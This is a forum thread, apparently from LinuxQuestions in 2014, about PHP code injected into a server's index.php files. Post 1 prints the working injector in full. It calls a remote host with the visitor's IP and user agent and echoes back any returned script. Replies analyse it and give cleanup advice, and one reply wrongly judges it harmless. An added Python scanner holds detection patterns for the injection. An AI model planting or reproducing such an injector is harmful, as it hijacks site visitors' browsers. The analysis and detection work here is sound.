Old 02-09-2014, 10:25 AM   #1
PatriceJ
LQ Newbie
 
Registered: Oct 2008
Location: France
Distribution: Debian
Posts: 24

Rep: Reputation: 0
Server Attacked code


Hello,

I found on some index.php file the following code added
Code:
#530da5#
error_reporting(0);
ini_set('display_errors',0);
$wp_srx6146 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_srx6146) && !preg_match ('/bot/i', $wp_srx6146))){
   $wp_srx096146="http://"."html"."value".".com/value"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_srx6146);
   $ch = curl_init();
   curl_setopt ($ch, CURLOPT_URL,$wp_srx096146);
   curl_setopt ($ch, CURLOPT_TIMEOUT, 6);
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
   $wp_6146srx = curl_exec ($ch);
   curl_close($ch);
}
if ( substr($wp_6146srx,1,3) === 'scr' ) {
   echo $wp_6146srx;
}
#/530da5#
Do you know what this code is doing, and what do you suggest to clean the server?
 
Old 02-09-2014, 12:45 PM   #2
Corpus-Khu
LQ Newbie
 
Registered: Oct 2011
Posts: 19

Rep: Reputation: Disabled
It is formatted oddly, possibly some type of code injection. What happens when you run the code? It looks like it would cause an error. A little later today I'm going to give this code a little attention; I have no idea what the preg_match is for.
 
Old 02-09-2014, 01:38 PM   #3
Habitual
LQ Veteran
 
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Blog Entries: 37

Rep: Reputation: Disabled
Check the site at http://www.unmaskparasites.com/secur...age=domain.com

Be especially alert for entries under "External References"

Please let us know...
 
1 members found this post helpful.
Old 02-09-2014, 02:03 PM   #4
sundialsvcs
LQ Guru
 
Registered: Feb 2004
Location: SE Tennessee, USA
Distribution: Gentoo, LFS
Posts: 10,659
Blog Entries: 4

Rep: Reputation: 3941
Analyzing the code that is present here, it does not superficially seem to me that the code is malicious, although it is obviously machine-generated as evidenced by the variable names ... as well as by the beginning and ending recognition tags that bracket the code. I also know that curl() is fundamentally a mechanism for initiating a programmatic HTTP "ping" against a remote web site. So maybe this is simply some kind of instrumentation code, designed to let someone out there gather usage statistics ... that "someone" being, say, the legitimate owner of the code/site.

I don't recognize which automated utility might have generated this code-sequence, but I can say pretty certainly that it was generated in such a way, and that it was designed to be removable by the same utility with equal ease. If you know who authored the original page, or can contact them, they can probably tell you right away.

My instincts tell me, however, that this code is probably innocent.

Last edited by sundialsvcs; 02-09-2014 at 02:05 PM.
 
Old 02-09-2014, 02:37 PM   #5
astrogeek
Moderator
 
Registered: Oct 2008
Distribution: Slackware [64]-X.{0|1|2|37|-current} ::12<=X<=15, FreeBSD_12{.0|.1}
Posts: 6,264
Blog Entries: 24

Rep: Reputation: 4194
I disagree; superficial analysis shows that if it is there without the website owner's knowledge, then it is an entirely malicious method of injecting content/code from a remote site into the page.

Here is a summary of what it does in pseudo code, but with the actual variable names and paths:

Code:
error_reporting(0) - Disable the page's error reporting to avoid detection

$wp_srx6146 = @$_SERVER['HTTP_USER_AGENT'] - Get the user agent string

Test if it is a browser and not a bot, if so...

$wp_srx096146="http://htmlvalue.com/value/?ip=..."

Makes remote request with user IP addr, page referer and user agent, useful for delivering ads,
but also useful for more nefarious purposes such as automated compromise attempts of the user
machine...

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_6146srx = curl_exec ($ch);

Fetches "something" from the remote host htmlvalue.com and assigns it to a new variable $wp_6146srx

if ( substr($wp_6146srx,1,3) === 'scr' ) {
   echo $wp_6146srx;
}

Finally, if the expected something was returned as identified by characters 1-3='scr', 
echo it into the web page...
Now, note that the final test matches <script>, so undoubtedly it is fetching and injecting javascript into the user's web page. At this point they own the browser view of that page...

They may be injecting ads, or they may be injecting something MUCH worse...

A sure-fire way to see what it is injecting is to put your IP address into the following URL and fetch it with wget. I have not done so as I do not want to launch a bot attack on my own IP!

htt p://html value.com/value/?ip=YOUR_IP&referer=SOME_REFERER&ua=SOME_USER_AGENT

If you care to do that and it returns something that looks like code, post it back here and I'll tell you what it really does...

The domain info (private):

Quote:
Registrant:

Name: Private Protection Co.LTD
Organization: Private Protection Co.LTD.
Address: NO.1111 Chaoyang Road, Beijing
City: Beijing
Province/state: BJ
Country: CN
Postal Code: 100000

Last edited by astrogeek; 02-09-2014 at 02:56 PM.
 
2 members found this post helpful.
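To go with the walk-through above, here is an added example (not code from the thread or from any of its posters) of how a defender can sweep a document root for this injection: a Python scanner that looks for the six-hex-digit marker pair that bracketed the posted block and, for copies that lost their markers, for the tell-tale trio of an obfuscated $wp_ variable read from the user agent, a curl_exec(), and an echo of a $wp_ variable. The remote host in the constructed sample is a placeholder, and the marker format is assumed to match the one in the first post.

```python
"""Added example: scan PHP files for the injected block shown in this thread.
Check (1): the `#xxxxxx# ... #/xxxxxx#` marker pair around the injected code.
Check (2): heuristic for the same family without markers: a $wp_* variable read
from HTTP_USER_AGENT, a curl_exec(), and an echo of a $wp_* variable."""
import re
from pathlib import Path

# Opening tag is '#' + six hex digits + '#'; the closing tag repeats it with a slash.
MARKER_RE = re.compile(r"#([0-9a-f]{6})#.*?#/\1#", re.DOTALL)
HEURISTIC_RES = [
    re.compile(r"\$wp_[0-9a-z]+\s*=\s*@?\$_SERVER\['HTTP_USER_AGENT'\]"),
    re.compile(r"curl_exec\s*\("),
    re.compile(r"echo\s+\$wp_[0-9a-z]+\s*;"),
]

def find_markers(src: str) -> list:
    """Return (marker_id, start, end) for every bracketed block in src."""
    return [(m.group(1), m.start(), m.end()) for m in MARKER_RE.finditer(src)]

def looks_injected(src: str) -> bool:
    """True when all three heuristic patterns occur in src."""
    return all(r.search(src) for r in HEURISTIC_RES)

def strip_blocks(src: str) -> tuple:
    """Remove every marker-bracketed block; return (cleaned_src, count)."""
    return MARKER_RE.subn("", src)

def scan_tree(root: Path, clean: bool = False) -> dict:
    """Report suspicious *.php files under root; optionally strip marked blocks."""
    report = {}
    for path in root.rglob("*.php"):
        src = path.read_text(errors="replace")
        ids = [m[0] for m in find_markers(src)]
        flagged = looks_injected(src)
        if ids or flagged:
            report[str(path)] = {"markers": ids, "heuristic": flagged}
            if clean and ids:  # only auto-clean blocks we can delimit exactly
                path.write_text(strip_blocks(src)[0])
    return report

# Constructed sample mimicking the posted code (remote host replaced by a placeholder).
SAMPLE = """<?php
#530da5#
error_reporting(0); $wp_srx6146 = @$_SERVER['HTTP_USER_AGENT'];
$ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://example.invalid/?ua=" . $wp_srx6146);
$wp_6146srx = curl_exec ($ch);
if ( substr($wp_6146srx,1,3) === 'scr' ) { echo $wp_6146srx; }
#/530da5#
echo 'legitimate page';
"""
```

Run `scan_tree(Path("/var/www"), clean=False)` first to review the report; files flagged only by the heuristic are left for manual inspection even with `clean=True`.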
Old 02-10-2014, 02:08 AM   #6
PatriceJ
LQ Newbie
 
Registered: Oct 2008
Location: France
Distribution: Debian
Posts: 24

Original Poster
Rep: Reputation: 0
Thank you

Thanks all of you for your time and answers.

I will test the code on my testing server and will let you know.

Patrice
 
Old 02-10-2014, 02:37 AM   #7
voleg
Member
 
Registered: Oct 2013
Distribution: RedHat CentOS Fedora SuSE
Posts: 354

Rep: Reputation: 51
This part is only the reporting part about browsers that visited this page,
and looks like a simple statistics counter, but:

It looks like you have other parts of code injecting something into the rest of the page(s).
Then this report becomes interesting for the attacker, about infected browsers.

1. Restore from good backup.
2. Make most things read only.
3. Close outgoing traffic by FW (if possible).

Last edited by voleg; 02-10-2014 at 02:39 AM.
 
Old 02-22-2014, 11:29 AM   #8
PatriceJ
LQ Newbie
 
Registered: Oct 2008
Location: France
Distribution: Debian
Posts: 24

Original Poster
Rep: Reputation: 0
Test of the code seen with Wireshark packet capture

Hello,

I have run the script on a dummy server that I use for test only.

I have used Wireshark to catch the traffic made by the code.

See the attached file.

If you could help decrypt, I would appreciate a lot.

I have replaced the first number of my intranet IP with MyIntranetIP.
194.158.122.10 is a DNS server


Thank you

Patrice
Attached file: Hacker-Wireshark-output.txt (96.0 KB)
 
Old 02-22-2014, 02:29 PM   #9
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3600
I'm sorry but Corpus-Khu should never have made that suggestion in the first place. (In a VM maybe, but you simply don't go around asking a victim to run code, especially code you don't understand yourself.)

The focus should have been on examining the extent of the damage, finding out how this could have taken place and then taking the appropriate measures.
Now you posted this on the 9th, meaning almost 2 weeks have passed, so please first tell me you did more for this server than play with Wireshark?
What did you do?
What did you find out?
 
Old 02-24-2014, 12:59 PM   #10
PatriceJ
LQ Newbie
 
Registered: Oct 2008
Location: France
Distribution: Debian
Posts: 24

Original Poster
Rep: Reputation: 0
I found nothing......
Wireshark seems to show that it tries to get info from the server, but I'm not sure.
The dummy server did not show anything else in the logs.
The running server is (seems) fine.
 
Old 02-24-2014, 01:05 PM   #11
Habitual
LQ Veteran
 
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Blog Entries: 37

Rep: Reputation: Disabled
Over here... you said "I found the following code in several index.php files."

Have you cleaned them?
 
Old 02-24-2014, 02:10 PM   #12
astrogeek
Moderator
 
Registered: Oct 2008
Distribution: Slackware [64]-X.{0|1|2|37|-current} ::12<=X<=15, FreeBSD_12{.0|.1}
Posts: 6,264
Blog Entries: 24

Rep: Reputation: 4194
Quote:
Originally Posted by PatriceJ View Post
I found nothing......
Wireshark seems to show that it tries to get info from the server, but I'm not sure.
The dummy server did not show anything else in the logs.
The running server is (seems) fine.
But other than finding out how the code got there, and removing it, it really isn't about the server!

The malicious traffic is not between that code and your server, it is between the remote host which the script contacts and the client which loads the script code from your server! So watching your own traffic log will not really show anything!

As Habitual asked, have you removed the code from all the files where you found it?

Last edited by astrogeek; 02-24-2014 at 02:23 PM.
 
Old 02-24-2014, 02:48 PM   #13
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3600
Looking for your code you won't find much, but search for another wp_ value... Seems quite widespread. Anyway, here is another explanation, in line with what astrogeek wrote, and this points to a possible infection vector: leeched FTP credentials, basically. Please check any machine with admin access for viruses and malware, check your server logs for intrusions, and check whatever is installed in your web stack for no longer maintained plugins or themes and basically any software versions considered stale or vulnerable.
 
Old 02-24-2014, 03:59 PM   #14
astrogeek
Moderator
 
Registered: Oct 2008
Distribution: Slackware [64]-X.{0|1|2|37|-current} ::12<=X<=15, FreeBSD_12{.0|.1}
Posts: 6,264
Blog Entries: 24

Rep: Reputation: 4194
For web 101 class today, I have prepared a simple sequence diagram to illustrate where your server and the malicious script fit into the overall scheme of such... schemes.

Hopefully it will make clear that your server is only a vector for delivering the script, which is itself a vector for delivering additional scripts and potentially gaining access to and control of the client machine, i.e. your site visitors.

The sequence of events is from top to bottom, in the direction of the various arrows.

Note that looking at traffic on your server will see very little, only the delivery of the page code, including the script tag, to your site visitors. Everything else takes place after that point and is between one or more remote sites and the client machine itself - not visible to you!

Important to note is not only that they can and usually do vector to other URLs to load additional malware, but beyond the initial script request they have the IP address of your visitors, and everything that they can connect to it! They can then launch exploits directly against the client machine, not only via their browser... this is how botnets are constructed.

The follow-on effects are spam email, DDOS attacks, banking and credit card fraud, targeted phishing attacks, extortions, threats, con games, manipulations, viruses, worms, obomacare and just about every other assorted fraud and crime against otherwise innocent victims - all because they visited your website!

Please confirm that you have removed the code from your servers!
Attached image: script.png (sequence diagram, 36.2 KB)

Last edited by astrogeek; 02-24-2014 at 04:12 PM.
 
2 members found this post helpful.
Old 02-25-2014, 01:53 AM   #15
PatriceJ
LQ Newbie
 
Registered: Oct 2008
Location: France
Distribution: Debian
Posts: 24

Original Poster
Rep: Reputation: 0
Thank you everybody for your answers, I appreciate a lot and will continue to investigate.

Of course I have removed all malicious code, it is the first thing I did!
 